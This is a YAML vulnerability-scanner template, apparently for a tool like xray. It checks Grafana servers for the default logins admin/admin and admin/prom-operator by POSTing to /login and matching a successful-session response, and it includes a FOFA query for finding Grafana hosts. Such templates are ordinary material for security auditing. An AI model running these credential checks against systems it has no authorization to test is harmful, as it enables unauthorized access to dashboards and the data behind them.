漏洞描述
Grafana default password (admin/admin) were discovered.
fofa: app="Grafana"
id: grafana-default-password
info:
name: Grafana Default Password
author: For3stCo1d
severity: high
verified: true
description: |-
Grafana default password (admin/admin) were discovered.
fofa: app="Grafana"
reference:
- https://grafana.com/docs/grafana/latest/installation/configuration/#auth-anonymous
tags: grafana,default-login
created: 2023/06/24
rules:
r0:
request:
method: POST
path: /login
headers:
Content-Type: application/json
body: '{"user":"admin","password":"admin"}'
expression: response.status == 200 && response.body.bcontains(b'"message":') && response.body.bcontains(b'"Logged in"') && response.raw_header.bcontains(b'grafana_session')
r1:
request:
method: POST
path: /login
headers:
Content-Type: application/json
body: '{"user":"admin","password":"prom-operator"}'
expression: response.status == 200 && response.body.bcontains(b'"message":') && response.body.bcontains(b'"Logged in"') && response.raw_header.bcontains(b'grafana_session')
expression: r0() || r1()